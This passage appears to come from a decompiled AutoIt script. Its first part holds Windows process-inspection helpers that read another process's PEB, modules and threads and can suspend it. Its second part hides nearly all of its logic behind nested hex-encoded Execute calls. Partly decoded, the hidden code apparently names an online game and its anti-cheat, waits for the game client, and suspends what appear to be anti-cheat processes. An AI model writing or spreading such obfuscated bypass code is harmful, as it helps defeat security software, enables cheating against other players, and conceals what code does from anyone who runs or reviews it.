  1682. LOCAL $PPEB,$IHEAPOFFSET,$STHEAPINFO,$STHEAPS,$IHEAPS
  1683. $PPEB=__PUDGETBASIC($HPROCESS,2)
  1684. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1685. IF @AUTOITX64 THEN
  1686. $IHEAPOFFSET=232
  1687. ELSE
  1688. $IHEAPOFFSET=136
  1689. ENDIF
  1690. $STHEAPINFO=DLLSTRUCTCREATE("ulong;ulong;ptr")
  1691. _PROCESSMEMORYREAD($HPROCESS,$PPEB+$IHEAPOFFSET,DLLSTRUCTGETPTR($STHEAPINFO),DLLSTRUCTGETSIZE($STHEAPINFO))
  1692. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1693. $IHEAPS=DLLSTRUCTGETDATA($STHEAPINFO,1)
  1694. IF $IHEAPS=0 THEN RETURN SETERROR(8,0,"")
  1695. $STHEAPS=DLLSTRUCTCREATE("ptr["&$IHEAPS&"]")
  1696. _PROCESSMEMORYREAD($HPROCESS,DLLSTRUCTGETDATA($STHEAPINFO,3),DLLSTRUCTGETPTR($STHEAPS),DLLSTRUCTGETSIZE($STHEAPS))
  1697. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1698. DIM $AHEAPS[$IHEAPS]
  1699. FOR $I=0 TO $IHEAPS-1
  1700. $AHEAPS[$I]=DLLSTRUCTGETDATA($STHEAPS,1,$I+1)
  1701. NEXT
  1702. RETURN SETEXTENDED($IHEAPS,$AHEAPS)
  1703. ENDFUNC
  1704. FUNC _PROCESSUDGETSUBSYSTEMINFO($HPROCESS)
  1705. LOCAL $PPEB,$ISUBSYSOFFSET,$STSUBSYSINFO
  1706. $PPEB=__PUDGETBASIC($HPROCESS,2)
  1707. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1708. IF @AUTOITX64 THEN
  1709. $ISUBSYSOFFSET=296
  1710. ELSE
  1711. $ISUBSYSOFFSET=180
  1712. ENDIF
  1713. $STSUBSYSINFO=DLLSTRUCTCREATE("ulong")
  1714. _PROCESSMEMORYREAD($HPROCESS,$PPEB+$ISUBSYSOFFSET,DLLSTRUCTGETPTR($STSUBSYSINFO),DLLSTRUCTGETSIZE($STSUBSYSINFO))
  1715. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1716. RETURN DLLSTRUCTGETDATA($STSUBSYSINFO,1)
  1717. ENDFUNC
  1718. FUNC _PROCESSUDSUSPEND($HPROCESS)
  1719. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,FALSE )
  1720. LOCAL $ARET=DLLCALL($_COMMON_NTDLL,"long","NtSuspendProcess","handle",$HPROCESS)
  1721. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  1722. IF $ARET[0]THEN RETURN SETERROR(6,$ARET[0],FALSE )
  1723. RETURN TRUE
  1724. ENDFUNC
  1725. FUNC _PROCESSUDRESUME($HPROCESS)
  1726. IF NOT ISPTR($HPROCESS)THEN RETURN SETERROR(1,0,FALSE )
  1727. LOCAL $ARET=DLLCALL($_COMMON_NTDLL,"long","NtResumeProcess","handle",$HPROCESS)
  1728. IF @ERROR THEN RETURN SETERROR(2,@ERROR,FALSE )
  1729. IF $ARET[0]THEN RETURN SETERROR(6,$ARET[0],FALSE )
  1730. RETURN TRUE
  1731. ENDFUNC
  1732. DIM $TAG_SYS_THREAD_INFO="uint64;uint64;uint64;ulong;ptr;ulong_ptr;ulong_ptr;ulong;ulong;ulong;ulong;ulong;"
  1733. DIM $TAG_IO_COUNTERS="uint64;uint64;uint64;uint64;uint64;uint64;"
  1734. DIM $TAG_SYS_PROC_INFO="ulong;ulong;uint64[3];uint64;uint64;uint64;ushort;ushort;ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong;ulong;ulong;ulong_ptr;ulong_ptr;ulong;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;"
  1735. IF @AUTOITX64 THEN $TAG_SYS_PROC_INFO&="ulong UnkX64Var;"
  1736. $TAG_SYS_PROC_INFO&=$TAG_IO_COUNTERS
  1737. FUNC _PROCESSUDLISTEVERYTHING($VFILTER=0,$IMATCHMODE=0,$BENUMTHREADS=TRUE )
  1738. LOCAL $ARET,$ABIGLIST,$ATHREADLIST,$STBUFFER,$STPROCINFO,$STTHREADINFO,$PBUFPTR,$PTHREADPTR
  1739. LOCAL $I,$ITEMP,$ITHREADOFFSET,$ITHREADSTSZ,$IX64OFFSET=0,$IPROCINDEX=1
  1740. LOCAL $STITLE,$IPID,$IPPID,$BFILTERON=FALSE ,$BMATCHMADE=TRUE
  1741. LOCAL $INUMTHREADS=0,$ITOTALPROCS=0,$ITOTALTHREADS=0,$IALLOC=4096,$IPROCLISTSZ=100
  1742. IF @AUTOITX64 THEN $IX64OFFSET=1
  1743. IF (ISSTRING($VFILTER)AND $VFILTER<>"")OR (ISNUMBER($VFILTER)AND $IMATCHMODE>2)THEN $BFILTERON=TRUE
  1744. WHILE $IALLOC<262144
  1745. $STBUFFER=DLLSTRUCTCREATE("ubyte["&$IALLOC&"]")
  1746. $ARET=DLLCALL($_COMMON_NTDLL,"long","NtQuerySystemInformation","int",5,"ptr",DLLSTRUCTGETPTR($STBUFFER),"ulong",$IALLOC,"ulong*",0)
  1747. IF @ERROR THEN RETURN SETERROR(2,@ERROR,"")
  1748. IF $ARET[0]=0 THEN EXITLOOP
  1749. IF $ARET[0]<>-1073741820 THEN RETURN SETERROR(6,$ARET[0],"")
  1750. IF $ARET[4]THEN
  1751. $IALLOC=$ARET[4]
  1752. ELSE
  1753. $IALLOC*=2
  1754. ENDIF
  1755. WEND
  1756. $PBUFPTR=$ARET[2]
  1757. DIM $ABIGLIST[$IPROCLISTSZ+1][28]
  1758. $ITHREADOFFSET=DLLSTRUCTGETSIZE(DLLSTRUCTCREATE($TAG_SYS_PROC_INFO))
  1759. $ITHREADSTSZ=DLLSTRUCTGETSIZE(DLLSTRUCTCREATE($TAG_SYS_THREAD_INFO))
  1760. WHILE 1
  1761. $STPROCINFO=DLLSTRUCTCREATE($TAG_SYS_PROC_INFO,$PBUFPTR)
  1762. $STITLE=DLLSTRUCTGETDATA(DLLSTRUCTCREATE("wchar["&DLLSTRUCTGETDATA($STPROCINFO,7)&"]",DLLSTRUCTGETDATA($STPROCINFO,9)),1)
  1763. $IPID=DLLSTRUCTGETDATA($STPROCINFO,11)
  1764. IF $STITLE="" AND $IPID=0 THEN $STITLE="System Idle Process"
  1765. $IPPID=DLLSTRUCTGETDATA($STPROCINFO,12)
  1766. IF $BFILTERON THEN
  1767. SWITCH $IMATCHMODE
  1768. CASE 0
  1769. IF $VFILTER<>$STITLE THEN $BMATCHMADE=FALSE
  1770. CASE 1
  1771. IF STRINGINSTR($STITLE,$VFILTER)=0 THEN $BMATCHMADE=FALSE
  1772. CASE 2
  1773. IF NOT STRINGREGEXP($STITLE,$VFILTER)THEN $BMATCHMADE=FALSE
  1774. CASE 3
  1775. IF $VFILTER<>$IPID THEN $BMATCHMADE=FALSE
  1776. CASE ELSE
  1777. IF $VFILTER<>$IPPID THEN $BMATCHMADE=FALSE
  1778. ENDSWITCH
  1779. ENDIF
  1780. IF $BMATCHMADE THEN
  1781. $ABIGLIST[$IPROCINDEX][0]=$STITLE
  1782. $ABIGLIST[$IPROCINDEX][1]=$IPID
  1783. $ABIGLIST[$IPROCINDEX][2]=$IPPID
  1784. $ABIGLIST[$IPROCINDEX][3]=DLLSTRUCTGETDATA($STPROCINFO,10)
  1785. $ABIGLIST[$IPROCINDEX][4]=DLLSTRUCTGETDATA($STPROCINFO,4)
  1786. $ABIGLIST[$IPROCINDEX][5]=DLLSTRUCTGETDATA($STPROCINFO,5)/1000
  1787. $ABIGLIST[$IPROCINDEX][6]=DLLSTRUCTGETDATA($STPROCINFO,6)/1000
  1788. $ABIGLIST[$IPROCINDEX][7]=DLLSTRUCTGETDATA($STPROCINFO,13)
  1789. $ABIGLIST[$IPROCINDEX][8]=DLLSTRUCTGETDATA($STPROCINFO,14)
  1790. FOR $I=9 TO 19
  1791. $ABIGLIST[$IPROCINDEX][$I]=DLLSTRUCTGETDATA($STPROCINFO,$I+7)
  1792. NEXT
  1793. FOR $I=20 TO 25
  1794. $ABIGLIST[$IPROCINDEX][$I]=DLLSTRUCTGETDATA($STPROCINFO,$I+7+$IX64OFFSET)
  1795. NEXT
  1796. $INUMTHREADS=DLLSTRUCTGETDATA($STPROCINFO,2)
  1797. $ABIGLIST[$IPROCINDEX][26]=$INUMTHREADS
  1798. $ITOTALTHREADS+=$INUMTHREADS
  1799. IF $BENUMTHREADS THEN
  1800. DIM $ATHREADLIST[$INUMTHREADS+1][12]
  1801. $PTHREADPTR=$PBUFPTR+$ITHREADOFFSET
  1802. FOR $I=1 TO $INUMTHREADS
  1803. $STTHREADINFO=DLLSTRUCTCREATE($TAG_SYS_THREAD_INFO,$PTHREADPTR)
  1804. $ATHREADLIST[$I][0]=DLLSTRUCTGETDATA($STTHREADINFO,7)
  1805. $ATHREADLIST[$I][1]=DLLSTRUCTGETDATA($STTHREADINFO,6)
  1806. $ATHREADLIST[$I][2]=DLLSTRUCTGETDATA($STTHREADINFO,5)
  1807. $ATHREADLIST[$I][3]=DLLSTRUCTGETDATA($STTHREADINFO,9)
  1808. $ATHREADLIST[$I][4]=DLLSTRUCTGETDATA($STTHREADINFO,8)
  1809. $ATHREADLIST[$I][5]=DLLSTRUCTGETDATA($STTHREADINFO,3)
  1810. $ATHREADLIST[$I][6]=DLLSTRUCTGETDATA($STTHREADINFO,2)/1000
  1811. $ATHREADLIST[$I][7]=DLLSTRUCTGETDATA($STTHREADINFO,1)/1000
  1812. $ATHREADLIST[$I][8]=DLLSTRUCTGETDATA($STTHREADINFO,4)
  1813. $ATHREADLIST[$I][9]=DLLSTRUCTGETDATA($STTHREADINFO,10)
  1814. $ATHREADLIST[$I][10]=DLLSTRUCTGETDATA($STTHREADINFO,11)
  1815. $ATHREADLIST[$I][11]=DLLSTRUCTGETDATA($STTHREADINFO,12)
  1816. $PTHREADPTR+=$ITHREADSTSZ
  1817. NEXT
  1818. $ATHREADLIST[0][0]=$INUMTHREADS
  1819. $ABIGLIST[$IPROCINDEX][27]=$ATHREADLIST
  1820. ELSE
  1821. $ABIGLIST[$IPROCINDEX][27]=""
  1822. ENDIF
  1823. $ITOTALPROCS+=1
  1824. IF $BFILTERON AND $IMATCHMODE=3 THEN EXITLOOP
  1825. $IPROCINDEX+=1
  1826. IF $IPROCINDEX>$IPROCLISTSZ THEN
  1827. $IPROCLISTSZ+=10
  1828. REDIM $ABIGLIST[$IPROCLISTSZ+1][28]
  1829. ENDIF
  1830. ENDIF
  1831. $BMATCHMADE=TRUE
  1832. $ITEMP=DLLSTRUCTGETDATA($STPROCINFO,1)
  1833. IF $ITEMP=0 THEN EXITLOOP
  1834. $PBUFPTR+=$ITEMP
  1835. WEND
  1836. REDIM $ABIGLIST[$ITOTALPROCS+1][28]
  1837. $ABIGLIST[0][0]=$ITOTALPROCS
  1838. $ABIGLIST[0][1]=$ITOTALTHREADS
  1839. RETURN $ABIGLIST
  1840. ENDFUNC
  1841. FUNC _PROCESSUDISSUSPENDED($VPROCESSID)
  1842. IF NOT __PFENFORCEPID($VPROCESSID)THEN RETURN SETERROR(1,0,FALSE )
  1843. LOCAL $ISUSPENDCOUNT=0,$ATHREADS=_PROCESSUDLISTEVERYTHING($VPROCESSID,3)
  1844. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  1845. IF $ATHREADS[0][0]=0 THEN RETURN SETERROR(32,@EXTENDED,FALSE )
  1846. $ATHREADS=$ATHREADS[1][27]
  1847. FOR $I=1 TO $ATHREADS[0][0]
  1848. IF $ATHREADS[$I][10]=5 AND $ATHREADS[$I][11]=5 THEN $ISUSPENDCOUNT+=1
  1849. NEXT
  1850. SETEXTENDED($ISUSPENDCOUNT)
  1851. IF $ISUSPENDCOUNT=$ATHREADS[0][0]THEN RETURN TRUE
  1852. RETURN FALSE
  1853. ENDFUNC
  1854. FUNC _PROCESSUDLISTMODULES($HPROCESS,$STITLEFILTER=0,$ITITLEMATCHMODE=0,$IORDER=0)
  1855. IF $IORDER<0 THEN $IORDER=0
  1856. IF $IORDER>2 THEN $IORDER=2
  1857. LOCAL $PPEB,$STPEBTOP,$PLDRDATA,$STLDRDATA,$STMODULEINFO,$SSTRUCTSTR,$STTMP,$STMP,$PMOD,$PLASTMOD,$IOFFSET
  1858. LOCAL $IARRSZ,$BMATCH1,$BMATCHMADE=TRUE ,$ITOTAL=0,$IMAXLOOPS=500
  1859. IF $STITLEFILTER="" THEN $STITLEFILTER=0
  1860. IF BITAND($ITITLEMATCHMODE,4)AND ISSTRING($STITLEFILTER)THEN
  1861. $IARRSZ=1
  1862. $BMATCH1=TRUE
  1863. $ITITLEMATCHMODE=BITAND($ITITLEMATCHMODE,3)
  1864. ELSE
  1865. $IARRSZ=50
  1866. $BMATCH1=FALSE
  1867. ENDIF
  1868. DIM $AMODULES[$IARRSZ+1][7]
  1869. $PPEB=__PUDGETBASIC($HPROCESS,2)
  1870. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1871. $STPEBTOP=DLLSTRUCTCREATE("byte;byte;byte;byte;handle;ptr;ptr")
  1872. _PROCESSMEMORYREAD($HPROCESS,$PPEB,DLLSTRUCTGETPTR($STPEBTOP),DLLSTRUCTGETSIZE($STPEBTOP))
  1873. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1874. $PLDRDATA=DLLSTRUCTGETDATA($STPEBTOP,7)
  1875. $STLDRDATA=DLLSTRUCTCREATE("ulong;byte;ptr;ptr;ptr;ptr;ptr;ptr;ptr;ptr")
  1876. _PROCESSMEMORYREAD($HPROCESS,$PLDRDATA,DLLSTRUCTGETPTR($STLDRDATA),DLLSTRUCTGETSIZE($STLDRDATA))
  1877. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1878. $SSTRUCTSTR="ptr;ptr;hwnd;ptr;ulong_ptr;ushort;ushort;ptr;ushort;ushort;ptr;ulong;ushort;ushort;ptr;ptr;ulong"
  1879. SWITCH $IORDER
  1880. CASE 0
  1881. $SSTRUCTSTR="ptr;ptr;ptr;ptr;"&$SSTRUCTSTR
  1882. $IOFFSET=7
  1883. CASE 1
  1884. $SSTRUCTSTR="ptr;ptr;"&$SSTRUCTSTR
  1885. $IOFFSET=5
  1886. CASE ELSE
  1887. $IOFFSET=3
  1888. ENDSWITCH
  1889. $STMODULEINFO=DLLSTRUCTCREATE($SSTRUCTSTR)
  1890. $PMOD=DLLSTRUCTGETDATA($STLDRDATA,4+$IORDER*2)
  1891. $PLASTMOD=DLLSTRUCTGETDATA($STLDRDATA,5+$IORDER*2)
  1892. WHILE 1
  1893. _PROCESSMEMORYREAD($HPROCESS,$PMOD,DLLSTRUCTGETPTR($STMODULEINFO),DLLSTRUCTGETSIZE($STMODULEINFO))
  1894. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1895. $STTMP=DLLSTRUCTCREATE("wchar["&ROUND(DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET+7)/2)&"]")
  1896. _PROCESSMEMORYREAD($HPROCESS,DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET+8),DLLSTRUCTGETPTR($STTMP),DLLSTRUCTGETSIZE($STTMP))
  1897. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1898. $STMP=DLLSTRUCTGETDATA($STTMP,1)
  1899. IF ISSTRING($STITLEFILTER)THEN
  1900. SWITCH $ITITLEMATCHMODE
  1901. CASE 0
  1902. IF $STITLEFILTER<>$STMP THEN $BMATCHMADE=FALSE
  1903. CASE 1
  1904. IF STRINGINSTR($STMP,$STITLEFILTER)=0 THEN $BMATCHMADE=FALSE
  1905. CASE ELSE
  1906. IF NOT STRINGREGEXP($STMP,$STITLEFILTER)THEN $BMATCHMADE=FALSE
  1907. ENDSWITCH
  1908. ENDIF
  1909. IF $BMATCHMADE THEN
  1910. $ITOTAL+=1
  1911. IF $ITOTAL>$IARRSZ THEN
  1912. $IARRSZ+=10
  1913. REDIM $AMODULES[$IARRSZ+1][7]
  1914. ENDIF
  1915. $STTMP=DLLSTRUCTCREATE("wchar["&ROUND(DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET+4)/2)&"]")
  1916. _PROCESSMEMORYREAD($HPROCESS,DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET+5),DLLSTRUCTGETPTR($STTMP),DLLSTRUCTGETSIZE($STTMP))
  1917. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1918. $AMODULES[$ITOTAL][0]=$STMP
  1919. $AMODULES[$ITOTAL][1]=DLLSTRUCTGETDATA($STTMP,1)
  1920. $AMODULES[$ITOTAL][2]=DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET)
  1921. $AMODULES[$ITOTAL][3]=$AMODULES[$ITOTAL][2]
  1922. $AMODULES[$ITOTAL][4]=DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET+2)
  1923. $AMODULES[$ITOTAL][5]=DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET+10)
  1924. $AMODULES[$ITOTAL][6]=DLLSTRUCTGETDATA($STMODULEINFO,$IOFFSET+1)
  1925. IF $AMODULES[$ITOTAL][6]=0 THEN $AMODULES[$ITOTAL][6]=0
  1926. IF $BMATCH1 THEN EXITLOOP
  1927. ENDIF
  1928. $BMATCHMADE=TRUE
  1929. $IMAXLOOPS-=1
  1930. IF $PMOD=$PLASTMOD OR $IMAXLOOPS=0 THEN EXITLOOP
  1931. $PMOD=DLLSTRUCTGETDATA($STMODULEINFO,1)
  1932. WEND
  1933. REDIM $AMODULES[$ITOTAL+1][7]
  1934. $AMODULES[0][0]=$ITOTAL
  1935. RETURN $AMODULES
  1936. ENDFUNC
  1937. FUNC _PROCESSUDGETMODULEBASEADDRESS($HPROCESS,$SMODULENAME)
  1938. LOCAL $AMODLIST=_PROCESSUDLISTMODULES($HPROCESS,$SMODULENAME,4)
  1939. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,-1)
  1940. IF $AMODLIST[0][0]=0 THEN RETURN SETERROR(-1,0,-1)
  1941. IF $AMODLIST[0][0]>1 THEN SETERROR(-16)
  1942. RETURN SETERROR(@ERROR,$AMODLIST[1][4],$AMODLIST[1][3])
  1943. ENDFUNC
  1944. FUNC _PROCESSUDGETMODULEBYADDRESS($HPROCESS,$PADDRESS)
  1945. IF NOT ISPTR($PADDRESS)THEN RETURN SETERROR(1,0,"")
  1946. LOCAL $IADDRESS,$IMODADDRESS,$AMODLIST,$ARETURN[7]
  1947. $AMODLIST=_PROCESSUDLISTMODULES($HPROCESS)
  1948. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  1949. $IADDRESS=INT($PADDRESS&"")
  1950. CONSOLEWRITE("Ptr looking for:"&$PADDRESS&" as Int:"&$IADDRESS&@CRLF)
  1951. FOR $I=1 TO $AMODLIST[0][0]
  1952. $IMODADDRESS=INT($AMODLIST[$I][3]&"")
  1953. IF $IADDRESS>=$IMODADDRESS AND $IADDRESS<($IMODADDRESS+$AMODLIST[$I][4])THEN
  1954. FOR $I2=0 TO 6
  1955. $ARETURN[$I2]=$AMODLIST[$I][$I2]
  1956. NEXT
  1957. RETURN $ARETURN
  1958. ENDIF
  1959. NEXT
  1960. RETURN SETERROR(16,0,"")
  1961. ENDFUNC
  1962. #Region ### START Koda GUI section ### Form=e:\mÜll\koda form\forms\de4su.kxf
  1963. $HSYSTEMTIME=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4D313537313134383830283138292926222226636872285F44313437313539343232283229292622322226636872285F43313635313137313231283132292926222226636872285F4F39363931313634332831342929262230222929"))
  1964. $HGUI=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F443731313731383032352832292926222226636872285F52313830363135373834283138292926222226636872285F543136333932303236362836292926222226636872285F433134393432323438372831382929262234373535343934333732363536313734363532383232343436353536363937323735353332303530373236463734363536333734363936463645323034333732363136333642344434353232324332303332333933393243323033313331333232433230333233383337324332303332333433313239222929"))
  1965. $HCLABEL1=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728223078322226636872285F4A3135373531363039392839292926222226636872285F47393831343133373438283134292926222226636872285F583133303531383230313028323029292622352226636872285F54373437323036373131283729292622343934333734373236433433373236353631373436353443363136323635364332383232343237393230343436353334353337353232324332303332333333323243323033383330324332303335333232433230333133373239222929"))
  1966. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F5131323337313335383133283138292926222226636872285F5331313031343131303431322831342929262234373535342226636872285F58393735313833373135283137292926223433373437323643342226636872285F4E313637313431353937313428372929262237323635363137343635343737323646373537303238323232323243323033313334333432433230333233343243323033313335333332433230333433313239222929"))
  1967. $HLABEL=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F5131383231303139313131372831292926222226636872285F5538323132313536313828313629292622323034372226636872285F4531373131373233383631392836292926222226636872285F4B37323931363934313628342929262234393433373437323643343337323635363137343635344336313632363536433238323235373631363937343639364536373230363636463732323035333334323034433635363136373735363532453245324532323243323033313336333032433230333433303243323033313331333932433230333133373239222929"))
  1968. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F483136363131313830353233283529292622343735353439342226636872285F573137363132313036343230283134292926222226636872285F4A3136323131313331313231283131292926222226636872285F4D3137363132313536363232283629292622373236433433373236353631373436353437373236463735373032383232323232433230324433393339324332303244333933393243323033313243323033313239222929"))
  1969. $HCB_ARCADE=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F5931353331313837353236283529292622322226636872285F573136323532313039323728313929292622343735352226636872285F473132363137313632373235283137292926223934333734372226636872285F453638343133393032342832302929262236433433373236353631373436353433363836353633364236323646373832383232343137323633363136343635323232433230333233343243323033343330324332303339333732433230333133373239222929"))
  1970. $CHECKBOX1=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E67282230782226636872285F5037303531373030323928323029292622302226636872285F483133383134323137313331283129292622373535342226636872285F58313134353134363432382831342929262234333734373236433433372226636872285F413131313130313933313330283129292622363536313734363534333638363536333642363236463738323832323434363535363639373237353533323034463645323232433230333133363243323033383338324332303338333132433230333133373239222929"))
  1971. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F4931303031323936353332283135292926222226636872285F4831353937313432373334283137292926223735353439342226636872285F553135313131313636333335283329292622372226636872285F553838303132303833332838292926223732364335333635373435333734363137343635323832443331324332303234343735353439354634333438343534333442343534343239222929"))
  1972. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4B313336313039363233362832292926222226636872285F45383836313636373339283729292622342226636872285F503136303931313936333728313629292622353534392226636872285F45393131313134333733382837292926223337343732364335333635373435333734363137343635323832443331324332303234343735353439354634343439353334313432344334353239222929"))
  1973. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E67282230782226636872285F42363631343732323430283132292926222226636872285F433132303133313138383432283138292926222226636872285F4231303331343935373431283729292622353439352226636872285F58313839353134333134332831312929262236353734353337343631373436353238343035333537354635333438344635373239222929"))
  1974. #EndRegion ### END Koda GUI section ###
  1975. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F423132373133313433343436283134292926222226636872285F52313533313331363836343728313629292622312226636872285F593132343139313139383435283829292622342226636872285F453934313039363634342831362929262243363936323532363536373639373337343635373232383232354633373333343233363639333036333334343232323243323033313330333033303239222929"))
  1976. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4831363430393437343828313729292622782226636872285F4D3134313531363638353128382929262231362226636872285F4E313337313931313738343928313829292622364336393632353236353637363937333734363537322226636872285F57313039313431343233353028332929262238323235463338333533313332363533313735343334313433323232433230333533303239222929"))
  1977. $STARTTIME=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F5A313838313331313738353428313829292622782226636872285F57313838353134323435352834292926222226636872285F4E31383931343933343533283134292926222226636872285F543138333537303435322831342929262246353436393644363537323546343936453639373432383239222929"))
  1978. WHILE 1
  1979. IF GUIGETMSG()=$GUI_EVENT_CLOSE THEN EXIT
  1980. WEND
  1981. FUNC _73B6I0C4B()
  1982. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F42313530313236383835362838292926227835332226636872285F45393439393137353728372929262234363137342226636872285F5631333535313336373539283137292926223936333230342226636872285F58313537313031313231353828312929262236463633363136433230323436393230334432303331222929"))
  1983. SWITCH $I
  1984. CASE 1
  1985. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E67282230782226636872285F5431373430313532303631283130292926222226636872285F563138323133323031323633283229292622352226636872285F5531373431313132383936302839292926223439342226636872285F56313730313431373638363228313829292622373437323643353336353734343436313734363132383234363834433631363236353643324332303232353736313639373436393645363732303636364637323230353333343230344336353631363737353635324532323239222929"))
  1986. CASE 2
  1987. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F5A3131303137313330333634283133292926222226636872285F5939303138313739363636283136292926222226636872285F51313233343135353036352831302929262237353534393433373437323643353336352226636872285F513131373432303333363728313329292622343434363137343631323832343638344336313632363536433243323032323537363136393734363936453637323036363646373232303533333432303443363536313637373536353245324532323239222929"))
  1988. CASE 3
  1989. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F593138383133313536393639283139292926222226636872285F4A313239313232303536373128362929262237352226636872285F4B3135383139313831333730283329292622343934333734373236433533362226636872285F4F3132323931333235363828313529292622373434343631373436313238323436383443363136323635364332433230323235373631363937343639364536373230363636463732323035333334323034433635363136373735363532453245324532323239222929"))
  1990. $I=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F5A31343631313632303733283130292926222226636872285F51313738313433383037322832302929262232303330222929"))
  1991. ENDSWITCH
  1992. $I+=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F57313532313333393237342832292926222226636872285F4A3135333438363437362834292926222226636872285F4D31323731373632323735283132292926223331222929"))
  1993. ENDFUNC
  1994. FUNC _8512E1UCAC()
  1995. IF PROCESSWAIT(""&CHR(_P1031090977(19))&""&CHR(_V18810138179(1))&""&CHR(_J12117114278(2))&"lien"&CHR(_L16411162080(10))&".exe")AND (@OSARCH="X64" OR NOT PROCESSWAIT("xtrap.xt"))THEN
  1996. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F45313437313431333331383328313129292622782226636872285F4C31383630383836383128362929262231363436432226636872285F523639353131303038322831302929262239363235353645352226636872285F5139343133313538343834283429292622363536373639373337343635373232383232354633373333343233363639333036333334343232323239222929"))
  1997. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728223078342226636872285F5A3133333134393037383528313729292622363436432226636872285F47393539313633313838283129292622392226636872285F453133303137313338303837283130292926222226636872285F4131303539313134393836283139292926223535364535323635363736393733373436353732323832323546333833353331333236353331373534333431343332323239222929"))
  1998. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F553731373132373839312838292926222226636872285F4131323934313439313932283129292622303732362226636872285F42313430313738303938392839292926222226636872285F4C313634313431303336393028362929262233363537333733343336433646373336353238323234313635363736393733324536353738363532323239222929"))
  1999. IF @OSARCH="X"&CHR(_Z1081726393(3))&"4" THEN
  2000. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F4E31343231303130353339352833292926222226636872285F4339323738343239342832292926222226636872285F59313831313131323936393628362929262230373236462226636872285F5231363639313533313937283131292926223336353733373334333643364637333635323832323431363536373639373333363334324536353738363532323239222929"))
  2001. ENDIF
  2002. IF _TIMER_DIFF($STARTTIME)<3000 THEN
  2003. ELSE
  2004. EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E6728222226636872285F52363731343538333938283133292926222226636872285F46313230313131323839313031283139292926223546332226636872285F48313532393130343131303028312929262233362226636872285F4231353731313831373939283729292622333431373333343638333534313436323832393230222929"))
  2005. ENDIF
  2006. ENDIF
  2007. ENDFUNC
  2008. FUNC _739FC2OE2D()
  2009. $HSYSTEMTIMENOW=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F4836383031313139313033283139292926222226636872285F453736313131353933313035283133292926223034303438344635353532323032362226636872285F443832353133353831303428313829292622303430344434393445322226636872285F493136303938373231303228313229292622323632303430353334353433222929"))
  2010. INIWRITE(@SCRIPTDIR&$HSYSTEMTIMENOW&".i"&CHR(_W159171299108(19))&""&CHR(_P68141551109(1))&"",""&CHR(_X1269814106(4))&""&CHR(_O18441044107(14))&"me","Now",$HSYSTEMTIMENOW)
  2011. IF $HSYSTEMTIME=0 THEN
  2012. $HSYSTEMTIME=EXECUTE(BINARYTOSTRING("0x457865637574652842696E617279546F537472696E672822302226636872285F4A37383139313535343131332834292926222226636872285F58373239383432313130283132292926222226636872285F57373231303133303631313228313629292622343034382226636872285F5636393431303739313131283929292622463535353232303236323034303444343934453230323632303430353334353433222929"))
  2013. ENDIF
  2014. IF $HSYSTEMTIME=$HSYSTEMTIMENOW THEN
